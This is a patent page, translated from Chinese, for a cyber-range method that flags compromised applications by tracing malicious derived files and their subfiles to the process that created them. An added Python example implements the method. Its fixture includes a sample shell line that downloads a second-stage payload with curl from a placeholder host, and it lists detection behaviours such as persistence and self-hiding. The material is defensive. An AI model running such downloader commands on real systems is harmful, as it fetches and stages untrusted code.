CN111027062A - Assessment method and device for application collapse state of target range

Info

Publication number
CN111027062A
Authority
CN
China
Prior art keywords
file
malicious
application
detected
derived
Prior art date
Legal status
Pending
Application number
CN201910248280.0A
Other languages
Chinese (zh)
Inventor
朱晴
曹月
徐艺航
肖新光
黄嘉燕
Current Assignee
Harbin Antian Science And Technology Group Co ltd
Harbin Antiy Technology Group Co Ltd
Original Assignee
Harbin Antian Science And Technology Group Co ltd
Priority date
2019-03-29
Filing date
2019-03-29
Publication date
2020-04-17
Application filed by Harbin Antian Science And Technology Group Co ltd

Classifications

    • G: PHYSICS
    • G06: COMPUTING; CALCULATING OR COUNTING
    • G06F: ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00: Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50: Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55: Detecting local intrusion or implementing counter-measures
    • G06F21/56: Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562: Static detection
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/14: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic

Abstract

The embodiment of the invention discloses a method and a device for evaluating the compromise state of an application in a cyber range. They relate to the technical field of network security and do not need to monitor all application services, which saves system resources. The method comprises the following steps: when an application generates a derived file, tracing the process that created the derived file and acquiring the application name and the system resource identifier corresponding to that creating process; and analyzing the derived file to judge whether it has a malicious attribute, and if so, generating a compromise event for the related application based on the application name and the system resource identifier. The state of a target in the cyber range is analyzed and evaluated by monitoring and analyzing the derived files.

Description

Assessment method and device for application collapse state of target range
Technical Field
The invention relates to the technical field of network security, in particular to a method and a device for evaluating the compromise state of an application in a cyber range.
Background
A cyber range needs to count and evaluate attack and defense results accurately. Typically, the range monitors whether a target has been attacked in order to evaluate the attack or defense situation. Because the operating system is multitask and multiprocess, the application service damaged by an attack is difficult to locate accurately and efficiently among the many application services. The traditional approach of monitoring the services generates a huge amount of invalid data, which seriously interferes with judging and locating the attack, degrades the performance of the range, and imposes a heavy storage cost.
Disclosure of Invention
In view of this, embodiments of the present invention provide a method and an apparatus for evaluating the compromise state of an application in a cyber range, which determine whether a related application has been attacked by analyzing whether a derived file generated by the application has a malicious attribute.
In a first aspect, an embodiment of the present invention provides a method for evaluating the compromise state of a range application, including:
when an application generates a derived file, tracing the process that created the derived file, and acquiring the application name and the system resource identifier corresponding to the creating process;
and analyzing the derived file and judging whether it has a malicious attribute, and if so, generating a compromise event for the related application based on the application name and the system resource identifier.
According to a specific implementation manner of the embodiment of the present invention, the method further includes: if the derived file is judged to have no malicious attribute, further monitoring the subfiles created by the derived file, analyzing the subfiles and judging whether they have a malicious attribute, and if a subfile has a malicious attribute, generating a compromise event for the related application based on the application name and the system resource identifier.
According to a specific implementation manner of the embodiment of the present invention, analyzing the derived file or the subfile and determining whether it has a malicious attribute includes:
taking the derived file or the subfile as the file to be detected;
searching with static sequence features and judging whether the file to be detected has a malicious attribute; or, alternatively,
monitoring dynamic behavior and judging whether the file to be detected has a malicious attribute.
According to a specific implementation manner of the embodiment of the present invention, determining whether the file to be detected has a malicious attribute by dynamic behavior monitoring includes:
monitoring whether the file to be detected has a deletion or hiding attribute;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the file to be detected has any of the suspicious behavior attributes configured by the collection system;
and if one or more of these behaviors occur, alone or in combination, judging that the file to be detected has a malicious attribute.
In a second aspect, an embodiment of the present invention provides an apparatus for evaluating the compromise state of a range application, including:
an application tracing module, used to trace the process that created a derived file when an application generates the derived file, and to acquire the application name and the system resource identifier corresponding to the creating process;
and an application evaluation module, used to analyze the derived file and judge whether it has a malicious attribute, and if so, to generate a compromise event for the related application based on the application name and the system resource identifier.
According to a specific implementation manner of the embodiment of the present invention, the application evaluation module is further configured to: if the derived file is judged to have no malicious attribute, further monitor the subfiles created by the derived file, analyze the subfiles and judge whether they have a malicious attribute, and if a subfile has a malicious attribute, generate a compromise event for the related application based on the application name and the system resource identifier.
According to a specific implementation manner of the embodiment of the present invention, analyzing the derived file or the subfile and determining whether it has a malicious attribute is specifically configured as:
taking the derived file or the subfile as the file to be detected;
searching with static sequence features and judging whether the file to be detected has a malicious attribute; or, alternatively,
monitoring dynamic behavior and judging whether the file to be detected has a malicious attribute.
According to a specific implementation manner of the embodiment of the present invention, determining whether the file to be detected has a malicious attribute by dynamic behavior monitoring includes:
monitoring whether the file to be detected has a deletion or hiding attribute;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the file to be detected has any of the suspicious behavior attributes configured by the collection system;
and if one or more of these behaviors occur, alone or in combination, judging that the file to be detected has a malicious attribute.
The method and apparatus for evaluating the compromise state of a range application provided by the embodiment of the invention differ from the traditional scheme of monitoring all applications: instead, the derived files of the target are collected and analyzed to judge whether they have malicious attributes; if they do, the application service related to the derived file is considered compromised, and a corresponding compromise event is generated.
A cyber range contains many targets, in most cases an extremely large number, and it is difficult to monitor all of them and evaluate their compromise state. The method and apparatus analyze the derived files of an application service and, when a derived file is judged to have a malicious attribute, judge that the related application service has been attacked. This greatly reduces system resource consumption and the storage capacity required; and because a centralized monitoring means is adopted, monitoring accuracy is greatly improved and the attacked application service and the related files can be located precisely.
Drawings
In order to illustrate the embodiments of the present invention or the technical solutions of the prior art more clearly, the drawings used in describing the embodiments or the prior art are briefly introduced below. Obviously, the drawings described below show only some embodiments of the present invention, and those skilled in the art can obtain other drawings from them without creative effort.
FIG. 1 is a flowchart of an embodiment of a method for evaluating the compromise state of a range application according to the present invention;
FIG. 2 is a flowchart of a method for evaluating the compromise state of a range application according to another embodiment of the present invention;
FIG. 3 is a schematic structural diagram of an apparatus for evaluating the compromise state of a range application according to an embodiment of the present invention.
Detailed Description
Embodiments of the present invention will be described in detail below with reference to the accompanying drawings.
It should be understood that the described embodiments are only some embodiments of the invention, and not all embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present invention.
To better describe the related embodiments of the present invention, the related terms are explained as follows:
cyber range: a cyber range is an important infrastructure for network attack and defense exercises and for evaluating new network technologies, used to improve the stability, security and performance of networks and information systems;
target: a target generally refers to part of an application service, or a specified file, running on an operating system in the cyber range.
In a first aspect, an embodiment of the present invention provides a method for evaluating the compromise state of a range application, in which whether an application is compromised is determined by monitoring and analyzing whether a derived file has a malicious attribute, so that system resources are saved and the compromise event can be located precisely.
Fig. 1 is a flowchart of an embodiment of a method for evaluating the compromise state of a range application according to the present invention, including:
S101: when an application generates a derived file, tracing the process that created the derived file, and acquiring the application name and the system resource identifier corresponding to the creating process;
S102: analyzing the derived file and judging whether it has a malicious attribute, and if so, generating a compromise event for the related application based on the application name and the system resource identifier.
Preferably, analyzing the derived file and determining whether it has a malicious attribute includes, but is not limited to:
taking the derived file as the file to be detected;
searching with static sequence features and judging whether the file to be detected has a malicious attribute; or, alternatively,
monitoring dynamic behavior and judging whether the file to be detected has a malicious attribute.
Preferably, determining whether the file to be detected has a malicious attribute by dynamic behavior monitoring includes, but is not limited to:
monitoring whether the file to be detected has a deletion or hiding attribute;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the file to be detected has any of the suspicious behavior attributes configured by the collection system;
and if one or more of these behaviors occur, alone or in combination, judging that the file to be detected has a malicious attribute.
It should be noted that tracing the process that created the derived file and obtaining the corresponding application name and system resource identifier may be performed when the application generates the derived file, or the trace may be performed on the application service corresponding to the derived file only after the derived file has been judged to have a malicious attribute; a person skilled in the art selects the specific manner as needed, which is not limited here.
In this embodiment, when an application generates a derived file, the derived file is collected and analyzed for malicious attributes; if a malicious attribute exists, the application service information is traced, a compromise event is generated from that information, and the event is provided to the range collection and evaluation system for evaluating the scale of compromised applications and systems.
Fig. 2 is a flowchart of a method for evaluating the compromise state of a range application according to another embodiment of the present invention, including:
S201: when an application generates a derived file f1, tracing the creation process proc1 of the derived file f1 and obtaining the application name app1 and the system resource identifier sys1 corresponding to proc1.
Here the range uses monitoring of the derived file f1 as the entry point for monitoring attacks on the target. The derived file f1 includes but is not limited to vbs, exe, sh and similar files. The system resource identifier sys1 includes but is not limited to the system IP, UUID and the like.
S202: and taking the derivative file f1 as a file to be detected.
S203: and searching and judging whether the file to be detected has the malicious attribute by using the static sequence feature, if so, executing S206, and if not, executing S204.
The searching and judging whether the file to be detected has the malicious attribute by using the static sequence feature specifically includes but is not limited to: determine if the document MD5 is a known threat document, extract the underlying structural features of the document to determine if it is a known threat family, etc.
S204: and (4) utilizing dynamic behavior monitoring to judge whether the file to be detected has the malicious attribute, if so, executing S206, and if not, executing S205.
More specifically, determining whether the file to be detected has a malicious attribute by dynamic behavior monitoring includes, but is not limited to:
monitoring whether the file to be detected has a deletion or hiding attribute;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the file to be detected has any of the suspicious behavior attributes configured by the collection system;
and if one or more of these behaviors occur, alone or in combination, judging that the file to be detected has a malicious attribute.
S205: the subfile created by the derivative file f1 is monitored, and the subfile is regarded as the file to be detected, and the process proceeds to S203.
S206: and generating an attack event of the application app1 corresponding to sys1proc 1.
More preferably, if the subfile does not have the malicious attribute in S205, the subfile created by the subfile is acquired, and S203 is continuously executed until it is determined that the malicious attribute exists or the related subfile does not exist, and the process is ended.
Specifically, an embodiment of the present invention provides an embodiment of the method for evaluating the compromise state of a range application in a concrete scenario, as follows:
The assumed scenario is: an attacker in the range environment exploits a vulnerability in a certain application (server1) so that a Trojan file is derived; the derived file itself has no malicious attribute, but after it runs it downloads, through a remote request, a subfile that contains a virus.
In this embodiment, the derived file is searched with static sequence features and no malicious attribute is found; when the derived file runs, network access behavior is observed, but no malicious behavior is found or confirmed; after the derived file remotely downloads the subfile, the subfile is searched with static sequence features and a malicious attribute is found immediately; server1 is then identified by tracing the related derived file, and the process number and application service information of server1 are recorded.
In this embodiment, when it cannot be determined whether the derived file has a malicious attribute, whether the derived file creates a related subfile, or a subfile of that subfile, is monitored, and whether that subfile has a malicious attribute is determined further; if it does, the application name and system resource identifier of the related application are obtained by tracing the derived file, and a compromise event for the application is generated. The embodiment can locate the attacked service and the attacked file with few system resources.
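The following is an added worked example, not code from the patent or from Harbin Antiy, that implements the first-aspect method (S101 to S102), the Fig. 2 flow (S201 to S206, including the repeated descent into subfiles of S205), and the server1 scenario just described, in Python. Every file content, MD5 digest, process id, IP, UUID and behavior name is a constructed sample value. The static check uses a known-threat MD5 set and a byte-pattern-to-family map as stand-ins for the patent's static sequence features; the dynamic check uses the three behavior attributes the patent names, with the "suspicious behaviors configured by the collection system" supplied as an assumed set.

```python
import hashlib
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample knowledge for the static check (hypothetical values, not from the patent).
KNOWN_THREAT_MD5 = {hashlib.md5(b"CONSTRUCTED-KNOWN-THREAT-SAMPLE").hexdigest()}
KNOWN_FAMILY_FEATURES = {b"DEMO_STAGE2_MARKER": "demo-family-A"}

# Dynamic behavior attributes named in the patent; CONFIGURED_SUSPICIOUS stands in for the
# "suspicious behaviors configured by the collection system" (the names are assumptions).
DELETE_OR_HIDE = "delete_or_hide_self"
PERSISTENCE_AUTOSTART = "persistence_autostart"
CONFIGURED_SUSPICIOUS = {"modifies_hosts_file", "disables_security_service"}


@dataclass
class CreatingProcess:
    """proc1: the process that wrote the derived file, with its app name (app1) and sys1 ids."""
    pid: int
    app_name: str
    system_ip: str
    uuid: str


@dataclass
class DerivedFile:
    """f1 (or one of its subfiles) together with what the monitor observed about it."""
    path: str
    content: bytes
    creator: CreatingProcess
    behaviors: Set[str] = field(default_factory=set)            # observed at run time
    children: List["DerivedFile"] = field(default_factory=list)  # files it created in turn


@dataclass
class CompromiseEvent:
    app_name: str
    system_ip: str
    uuid: str
    pid: int
    malicious_file: str
    reason: str


def static_check(f: DerivedFile) -> Optional[str]:
    """S203: known-threat MD5 first, then structural features that identify a known family."""
    digest = hashlib.md5(f.content).hexdigest()
    if digest in KNOWN_THREAT_MD5:
        return f"static: known threat md5 {digest}"
    for marker, family in KNOWN_FAMILY_FEATURES.items():
        if marker in f.content:
            return f"static: structural feature matches family {family}"
    return None


def dynamic_check(f: DerivedFile) -> Optional[str]:
    """S204: one or more of the monitored behaviors, alone or combined, marks the file malicious."""
    watched = {DELETE_OR_HIDE, PERSISTENCE_AUTOSTART} | CONFIGURED_SUSPICIOUS
    hits = sorted(f.behaviors & watched)
    return f"dynamic: {', '.join(hits)}" if hits else None


def evaluate(derived: DerivedFile, max_depth: int = 8) -> Optional[CompromiseEvent]:
    """S201 to S206 for one derived file: trace its creator, then check it and its subfiles
    breadth-first until a malicious file is found or no subfiles remain (max_depth bounds it)."""
    proc = derived.creator                      # S201: creating process -> app1, sys1
    queue = [(derived, 0)]                      # S202: f1 is the first file to be detected
    while queue:
        f, depth = queue.pop(0)
        reason = static_check(f) or dynamic_check(f)   # S203, then S204
        if reason:                                     # S206: emit the compromise event
            return CompromiseEvent(proc.app_name, proc.system_ip, proc.uuid, proc.pid, f.path, reason)
        if depth < max_depth:                          # S205: descend into the subfiles it created
            queue.extend((c, depth + 1) for c in f.children)
    return None                                        # chain ended with nothing malicious


def run_scenario() -> Optional[CompromiseEvent]:
    """The patent's scenario: server1 drops a clean loader that later downloads an infected subfile."""
    server1 = CreatingProcess(pid=4242, app_name="server1", system_ip="10.0.0.5", uuid="target-uuid-0001")
    stage2 = DerivedFile("/tmp/stage2.bin", b"\x7fELF...DEMO_STAGE2_MARKER...", server1)
    loader = DerivedFile("/tmp/loader.sh",
                         b"#!/bin/sh\ncurl http://example.invalid/s2 -o /tmp/stage2.bin\n",
                         server1, behaviors={"network_access"}, children=[stage2])
    return evaluate(loader)


if __name__ == "__main__":
    print(run_scenario())
```

The loader is not flagged: its MD5 is unknown, it carries no family marker, and plain network access is not one of the watched behaviors, which matches the scenario's "network access observed but no malicious behavior confirmed". Only when the queue reaches the downloaded subfile does the structural feature match, and the event is still attributed to server1 because the creator was traced once at the top of the chain. The `max_depth` bound is an addition the patent does not mention; it keeps a runaway dropper chain from consuming the very resources the method is meant to save.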
In a second aspect, an embodiment of the present invention provides an apparatus for evaluating the compromise state of a range application, which determines whether an application is compromised by monitoring and analyzing whether a derived file has a malicious attribute, so that system resources are saved and the compromise event can be located precisely.
Fig. 3 is a schematic structural diagram of an embodiment of an apparatus for evaluating the compromise state of a range application according to the present invention; the apparatus of this embodiment may include:
an application tracing module 301, configured to trace the process that created a derived file when an application generates the derived file, and to obtain the application name and the system resource identifier corresponding to the creating process;
an application evaluation module 302, configured to analyze the derived file and determine whether it has a malicious attribute, and if so, to generate a compromise event for the related application based on the application name and the system resource identifier.
Preferably, the application evaluation module is further configured to: if the derived file is judged to have no malicious attribute, further monitor the subfiles created by the derived file, analyze the subfiles and judge whether they have a malicious attribute, and if a subfile has a malicious attribute, generate a compromise event for the related application based on the application name and the system resource identifier.
Preferably, analyzing the derived file or the subfile and determining whether it has a malicious attribute is specifically configured as:
taking the derived file or the subfile as the file to be detected;
searching with static sequence features and judging whether the file to be detected has a malicious attribute; or, alternatively,
monitoring dynamic behavior and judging whether the file to be detected has a malicious attribute.
Preferably, determining whether the file to be detected has a malicious attribute by dynamic behavior monitoring includes:
monitoring whether the file to be detected has a deletion or hiding attribute;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the file to be detected has any of the suspicious behavior attributes configured by the collection system;
and if one or more of these behaviors occur, alone or in combination, judging that the file to be detected has a malicious attribute.
When an application generates a derived file, the apparatus collects and analyzes whether the related derived file has a malicious attribute; if so, the application service information is traced, a compromise event is generated from that information, and the event is provided to the range collection and evaluation system for evaluating the scale of compromised applications and systems.
It is noted that, herein, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Also, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other identical elements in a process, method, article, or apparatus that comprises the element.
All the embodiments in the present specification are described in a related manner, and the same and similar parts among the embodiments may be referred to each other, and each embodiment focuses on the differences from the other embodiments.
In particular, as for the apparatus embodiment, since it is substantially similar to the method embodiment, the description is relatively simple, and for the relevant points, reference may be made to the partial description of the method embodiment.
For convenience of description, the above devices are described separately in terms of functional division into various units/modules. Of course, the functionality of the units/modules may be implemented in one or more software and/or hardware implementations of the invention.
It will be understood by those skilled in the art that all or part of the processes of the methods of the embodiments described above can be implemented by a computer program, which can be stored in a computer-readable storage medium, and when executed, can include the processes of the embodiments of the methods described above. The storage medium may be a magnetic disk, an optical disk, a Read-Only Memory (ROM), a Random Access Memory (RAM), or the like.
The above description is only for the specific embodiment of the present invention, but the scope of the present invention is not limited thereto, and any changes or substitutions that can be easily conceived by those skilled in the art within the technical scope of the present invention are included in the scope of the present invention. Therefore, the protection scope of the present invention shall be subject to the protection scope of the claims.

Claims (8)

1. A method for evaluating the compromise state of a range application, comprising:
when an application generates a derived file, tracing the process that created the derived file, and acquiring the application name and the system resource identifier corresponding to the creating process;
and analyzing the derived file and judging whether it has a malicious attribute, and if so, generating a compromise event for the related application based on the application name and the system resource identifier.
2. The evaluation method of claim 1, further comprising: if the derived file is judged to have no malicious attribute, further monitoring the subfiles created by the derived file, analyzing the subfiles and judging whether they have a malicious attribute, and if a subfile has a malicious attribute, generating a compromise event for the related application based on the application name and the system resource identifier.
3. The evaluation method according to claim 1 or 2, wherein analyzing the derived file or subfile and determining whether it has a malicious attribute comprises:
taking the derived file or the subfile as the file to be detected;
searching with static sequence features and judging whether the file to be detected has a malicious attribute; or, alternatively,
monitoring dynamic behavior and judging whether the file to be detected has a malicious attribute.
4. The evaluation method of claim 3, wherein determining whether the file to be detected has a malicious attribute by dynamic behavior monitoring comprises:
monitoring whether the file to be detected has a deletion or hiding attribute;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the file to be detected has any of the suspicious behavior attributes configured by the collection system;
and if one or more of these behaviors occur, alone or in combination, judging that the file to be detected has a malicious attribute.
5. An apparatus for evaluating the compromise state of a range application, comprising:
an application tracing module, used to trace the process that created a derived file when an application generates the derived file, and to acquire the application name and the system resource identifier corresponding to the creating process;
and an application evaluation module, used to analyze the derived file and judge whether it has a malicious attribute, and if so, to generate a compromise event for the related application based on the application name and the system resource identifier.
6. The evaluation apparatus of claim 5, wherein the application evaluation module is further configured to: if the derived file is judged to have no malicious attribute, further monitor the subfiles created by the derived file, analyze the subfiles and judge whether they have a malicious attribute, and if a subfile has a malicious attribute, generate a compromise event for the related application based on the application name and the system resource identifier.
7. The evaluation apparatus according to claim 5 or 6, wherein analyzing the derived file or subfile and determining whether it has a malicious attribute comprises:
taking the derived file or the subfile as the file to be detected;
searching with static sequence features and judging whether the file to be detected has a malicious attribute; or, alternatively,
monitoring dynamic behavior and judging whether the file to be detected has a malicious attribute.
8. The evaluation apparatus according to claim 7, wherein determining whether the file to be detected has a malicious attribute by dynamic behavior monitoring comprises:
monitoring whether the file to be detected has a deletion or hiding attribute;
monitoring whether the file to be detected has a persistence attribute set for self-starting;
monitoring whether the file to be detected has any of the suspicious behavior attributes configured by the collection system;
and if one or more of these behaviors occur, alone or in combination, judging that the file to be detected has a malicious attribute.

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201910248280.0A CN111027062A (en) 2019-03-29 2019-03-29 Assessment method and device for application collapse state of target range

Publications (1)

Publication Number Publication Date
CN111027062A true CN111027062A (en) 2020-04-17

Family

ID=70199509

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201910248280.0A Pending CN111027062A (en) 2019-03-29 2019-03-29 Assessment method and device for application collapse state of target range

Country Status (1)

Country Link
CN (1) CN111027062A (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN112270085A (en) * 2020-10-26 2021-01-26 广州锦行网络科技有限公司 Dynamic design method of 3D network shooting range

Citations (15)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20110219449A1 (en) * 2010-03-04 2011-09-08 St Neitzel Michael Malware detection method, system and computer program product
US20130097706A1 (en) * 2011-09-16 2013-04-18 Veracode, Inc. Automated behavioral and static analysis using an instrumented sandbox and machine learning classification for mobile security
CN103077353A (en) * 2013-01-24 2013-05-01 北京奇虎科技有限公司 Method and device for actively defending rogue program
CN103646213A (en) * 2013-09-26 2014-03-19 北京神州绿盟信息安全科技股份有限公司 Method and device for classifying malicious software
US20140123280A1 (en) * 2012-10-30 2014-05-01 Gabriel Kedma Runtime detection of self-replicating malware
CN103839003A (en) * 2012-11-22 2014-06-04 腾讯科技(深圳)有限公司 Malicious file detection method and device
CN103902908A (en) * 2013-12-25 2014-07-02 武汉安天信息技术有限责任公司 Method and system for detecting malicious codes of Android reinforced applications
CN103970766A (en) * 2013-01-29 2014-08-06 腾讯科技(深圳)有限公司 Data file handling method, device and terminal
CN104732140A (en) * 2015-04-13 2015-06-24 成都睿峰科技有限公司 Program data processing method
CN104796416A (en) * 2015-04-08 2015-07-22 中国科学院信息工程研究所 Botnet simulation method and botnet simulation system
KR101593183B1 (en) * 2014-08-22 2016-02-15 한국전자통신연구원 Automatic act expression apparatus and method of for analysis of malicious code in a virtual environment
US20160285914A1 (en) * 2015-03-25 2016-09-29 Fireeye, Inc. Exploit detection system
CN108021428A (en) * 2017-12-05 2018-05-11 华迪计算机集团有限公司 Method and system for implementing a cyber range based on Docker
WO2018123061A1 (en) * 2016-12-28 2018-07-05 デジタルア-ツ株式会社 Information processing device and program
CN108334781A (en) * 2018-03-07 2018-07-27 腾讯科技(深圳)有限公司 Method for detecting virus, device, computer readable storage medium and computer equipment

Patent Citations (15)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20110219449A1 (en) * 2010-03-04 2011-09-08 St Neitzel Michael Malware detection method, system and computer program product
US20130097706A1 (en) * 2011-09-16 2013-04-18 Veracode, Inc. Automated behavioral and static analysis using an instrumented sandbox and machine learning classification for mobile security
US20140123280A1 (en) * 2012-10-30 2014-05-01 Gabriel Kedma Runtime detection of self-replicating malware
CN103839003A (en) * 2012-11-22 2014-06-04 腾讯科技(深圳)有限公司 Malicious file detection method and device
CN103077353A (en) * 2013-01-24 2013-05-01 北京奇虎科技有限公司 Method and device for actively defending rogue program
CN103970766A (en) * 2013-01-29 2014-08-06 腾讯科技(深圳)有限公司 Data file handling method, device and terminal
CN103646213A (en) * 2013-09-26 2014-03-19 北京神州绿盟信息安全科技股份有限公司 Method and device for classifying malicious software
CN103902908A (en) * 2013-12-25 2014-07-02 武汉安天信息技术有限责任公司 Method and system for detecting malicious codes of Android reinforced applications
KR101593183B1 (en) * 2014-08-22 2016-02-15 한국전자통신연구원 Automatic act expression apparatus and method of for analysis of malicious code in a virtual environment
US20160285914A1 (en) * 2015-03-25 2016-09-29 Fireeye, Inc. Exploit detection system
CN104796416A (en) * 2015-04-08 2015-07-22 中国科学院信息工程研究所 Botnet simulation method and botnet simulation system
CN104732140A (en) * 2015-04-13 2015-06-24 成都睿峰科技有限公司 Program data processing method
WO2018123061A1 (en) * 2016-12-28 2018-07-05 デジタルア-ツ株式会社 Information processing device and program
CN108021428A (en) * 2017-12-05 2018-05-11 华迪计算机集团有限公司 Method and system for implementing a cyber range based on Docker
CN108334781A (en) * 2018-03-07 2018-07-27 腾讯科技(深圳)有限公司 Method for detecting virus, device, computer readable storage medium and computer equipment

Non-Patent Citations (7)

* Cited by examiner, † Cited by third party
Title
DAVID (YU) ZHU et al.: "TaintEraser: protecting sensitive data leaks using application-level taint tracking", ACM SIGOPS OPERATING SYSTEMS REVIEW, vol. 45, no. 1, pages 142-154 *
ZHIQIANG LIN et al.: "Reverse Engineering Input Syntactic Structure from Program Execution and Its Application", IEEE TRANSACTIONS ON SOFTWARE ENGINEERING, vol. 36, no. 5, pages 688-703, XP011295191 *
张翔飞 et al.: "Sandbox escape detection based on multi-level behavioral differences and its implementation", 计算机工程与应用, vol. 54, no. 13, pages 111-116 *
房鼎益 et al.: "A virtualization-based software protection method resistant to semantic attacks", 工程科学与技术, vol. 49, no. 01, pages 159-168 *
曹立铭 et al.: "Security detection of virtual machine processes on a private cloud platform", 计算机应用研究, vol. 30, no. 05, pages 1495-1499 *
梁鸿生 et al.: "Development of a virtual device driver for file monitoring", 现代电子技术, no. 11, pages 47-49 *
郑生军 et al.: "Online detection system for advanced malware attacks based on virtual execution technology", 信息网络安全, no. 01, pages 29-33 *

Similar Documents

Publication Publication Date Title
Tang et al. Nodemerge: Template based efficient data reduction for big-data causality analysis
KR100938672B1 (en) The method and apparatus for detecting dll inserted by malicious code
KR101246623B1 (en) Apparatus and method for detecting malicious applications
CN110213207B (en) Network security defense method and equipment based on log analysis
US7913233B2 (en) Performance analyzer
CN102413142A (en) Active defense method based on cloud platform
CN112073437B (en) Multi-dimensional security threat event analysis method, device, equipment and storage medium
KR20130134790A (en) Method and system for storing the integrity information of application, method and system for checking the integrity of application
CN105095759A (en) File detection method and device
CN112131571B (en) Threat tracing method and related equipment
CN111078513A (en) Log processing method, device, equipment, storage medium and log alarm system
CN112685682A (en) Method, device, equipment and medium for identifying forbidden object of attack event
CN114528457A (en) Web fingerprint detection method and related equipment
CN111931185A (en) Java anti-serialization vulnerability detection method and component
CN105791250B (en) Application program detection method and device
CN111027062A (en) Assessment method and device for application collapse state of target range
CN106446687B (en) Malicious sample detection method and device
CN116155519A (en) Threat alert information processing method, threat alert information processing device, computer equipment and storage medium
KR101582420B1 (en) Method and apparatus for checking integrity of processing module
US11763004B1 (en) System and method for bootkit detection
KR101725395B1 (en) System and method for analysing a malicious script behavior information based on HTML5
CN116938605B (en) Network attack protection method and device, electronic equipment and readable storage medium
CN112395602B (en) Processing method, device and system for static security feature database
JP7302223B2 (en) Script detection device, method and program
KR101726360B1 (en) Method and server for generating suffix tree, method and server for detecting malicious code with using suffix tree

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
CB02 Change of applicant information

Address after: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Heilongjiang Province (No. 838, Shikun Road)

Applicant after: Antan Technology Group Co.,Ltd.

Address before: 150028 building 7, innovation and entrepreneurship square, science and technology innovation city, Harbin high tech Industrial Development Zone, Harbin, Heilongjiang Province (No. 838, Shikun Road)

Applicant before: Harbin Antian Science and Technology Group Co.,Ltd.